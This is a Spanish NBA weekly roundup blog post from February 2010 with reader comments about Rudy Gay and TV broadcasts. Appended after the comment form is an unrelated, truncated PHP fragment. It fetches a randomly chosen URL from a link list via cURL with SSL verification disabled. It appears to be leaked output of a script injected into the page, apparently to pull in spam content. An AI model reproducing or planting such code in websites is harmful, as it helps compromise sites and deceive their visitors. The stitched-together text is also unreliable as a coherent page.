Informe Semanal #14

01 de February de 2010 por TheDeerHunter

¿Porqué todos los jugones sonríen igual?

Sonríe LeBron en una semana plácida donde no se ha contestado el liderato de los Cavs. Sonríe Kobe, haciendo anoche otra de las suyas para dejar a todo el Boston Garden con cara de pasmados, culminando una gira que, al tran-tran, no ha sido tan fiera como la pintaban.

Sonríen Deron Williams y Derrick Rose, por debutar en el all-star y consolidar su puesto en playoffs. Sonríe, por último, Bosh desde la quinta plaza del Este por la que nadie hubiera dado un duro y con casi un 60% de victorias de los Raptors.

Ganarás el pan con el sudor de tu frente.

Días de vino y rosas en la zona noble del Este. Orlando ha ajustado conceptos, sobre todo en defensa y la distribución de los pesos específicos. Los Hawks mantienen el tipo, aunque no se lo terminan de creérselo del todo.

La mejor defensa de la liga, la de Larry Brown en Charlotte ha cuajado el mejor mes de su historia y transmite una seguridad que no logran otros ilustres. Un hueso duro a evitar en los cruces, porque ahora mismo hay pocas dudas de que van a entrar en postemporada. Los Bucks se resisten a no hacerlo… ponen en jaque a Miami. ¿Quién lo iba a decir?

La buena noticia para los Hornets es que con sangre, sudor y lágrimas se han colado en plaza de playoff en el Oeste. La mala-malísima es que perderán a CP3 durante un mes. Billups le sustituirá en el All-Star. Los Nuggets andan sobradísimos en su 2ª plaza sin necesidad de que juegue Melo. Mientras, Thunder y Grizzlies al acecho ante la previsible flojera de los Hornets (aunque no la hubo en la anterior baja de Paul). En el estado de forma que se encuentran son malos compañeros de baile en una pelea como la que se avecina.

Se dejaban llevar.

Muy extraño esto del deporte de élite. Tan sólo una canasta, algo afortunada, pone patas arriba la viabilidad de un proyecto tan sólido como ha sido el de los Celtics hasta anoche. No fue una canasta cualquiera, lo fue contra los odiados Lakers. Al pie de los caballos Ray Allen, de quien muchos que antes idolatraban ahora piden su mismísima crucifixión. Es irónico que tuviera en sus manos la victoria por dos veces, una defensiva y otra ofensiva. Tan sólo el destino le separó de aplazar este linchamiento al menos durante un tiempo. Soy de los que piensan que lo suyo está ya hace algún tiempo firmado en Boston. Un grave error, mientras no se demuestre lo contrario.

Peor lo van a tener los Heat, completament desorientados y al borde del precipicio. ¿Soy el único que vislumbra una espada de Damocles encima de la almendra de Erik Spoelstra?

Wizards o Sixers han logrado una de esas raras semanas que no finalizan con un chufo. Demasiado lejos de sus objetivos para valorar si es positivo o negativo.

En el Oeste mucha fragilidad en varios ilustres. No logramos explicar lo que pasa con los Mavs. Sin Parker tendría más sentido lo de los Spurs, aunque se ha demostrado sobradamente que con él no se mejora el resultado. Houston o Suns están cada vez más desorientados. En todo ese río revuelto McMillan todavía es capaz de pescar algo. Al menos, de momento.

Es noticia que los dos colistas de la liga ganen algún partido una misma semana. ¿Algo en común además de ser colistas? Los Clippers como víctima.

El carabasas club.

Ya va siendo el momento de que algunos comiencen a enseñar sus cartas. Sin el más mínimo rubor varios equipos se van posicionando para el “John Wall Trophy” pretendiendo que no se les note demasiado. Siempre pueden recurrir a la socorrida excusa de: “¿Qué queréis que hagamos? Si somos tan malos que no lograríamos ganar a una banda de jubilados.”

No vamos a dar nombres… ya sabemos todos quienes son los sospechosos.

Comenta

4 comentarios a esta entrada

  1. PIRATA dice:
    #1

    No creeis que desde que se publicaron los suplentes del all-star el nivel de Rudy Gay ha bajado en picado?

      Citar

  2. Love Denise dice:
    #2

    gran articulo para resumir la semana. ahora escribo menos por falta de tiempo lo que implica que no puedo ver partidos, pero os leo todos los dias. Grandisimo trabajo y esfuerzo el que haceis.

      Citar

  3. max dice:
    #3

    Pirata, la presencia de Z.Randolph en el All Star Week-End seguro que ha supuesto un duro golpe para el ego de Rudy Gay, que desde que llegó a la NBA ha sido el niño mimado en los Grizzlies. Ahora hay que ver si ello repercute en el nivel de juego del equipo, pero de momento los dos primeros partidos por su parte han sido bastante malos.

      Citar

  4. CAMPO2 dice:
    #4

    me lo parece a mi o en la foto esteve nash es david bowie,

    no entiendo a cuatro, estos años anteriores nos machacaban retransmitiendo partidos de los grizzlies en los cuales se iban perdiendo de 10 o mas en el primer cuarto dando imagen de autentica banda y ahora que juegan bien y los partidos tienen emoción, han dejado de retransmitirlos.

    No lo entiendo y que conste que agradezco que no hechen la españolada de estos años atras y procuran hechar buenos partidos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>